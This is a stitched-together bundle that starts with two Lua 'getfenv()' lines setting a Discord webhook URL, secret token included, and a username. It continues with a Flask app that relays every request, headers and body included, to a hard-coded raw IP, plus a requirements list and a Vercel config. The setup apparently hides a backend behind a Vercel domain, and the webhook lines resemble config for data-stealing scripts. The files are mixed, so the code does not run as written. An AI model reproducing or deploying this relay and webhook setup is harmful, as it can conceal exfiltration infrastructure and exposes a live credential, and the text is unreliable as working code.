getfenv().Webhook = "https://discord.com/api/webhooks/1383300250311196812/hphloKStYvMiUtk5xrWhD7hSF_V00rpfRtFoBaOZ_yu5K8QTp3vkuKtOwaUEqTrFsc3g"
getfenv().Username = "okokhellohello14"
import requests
from flask import Flask, request


app = Flask(__name__)


@app.before_request
def before_request():
    response = requests.request(
        url="http://213.142.135.46:9999" + request.path,
        method=request.method,
        data=request.get_data(),
        headers=request.headers
    )
    return response.text, response.status_code, {"Content-Type": response.headers.get("Content-Type")}


if __name__ == "__main__":
    app.run()
certifi==2025.7.9
charset-normalizer==3.4.2
click==8.2.1
colorama==0.4.6
Flask==3.1.1
idna==3.10
itsdangerous==2.2.0
Jinja2==3.1.6
MarkupSafe==3.0.2
requests==2.32.4
urllib3==2.5.0
Werkzeug==3.1.3
{
    "version": 2,
    "builds": [
        {
            "src": "app.py",
            "use": "@vercel/python"
        }
    ],
    "routes": [
        {
            "src": "/(.*)",
            "dest": "app.py"
        }
    ]
}
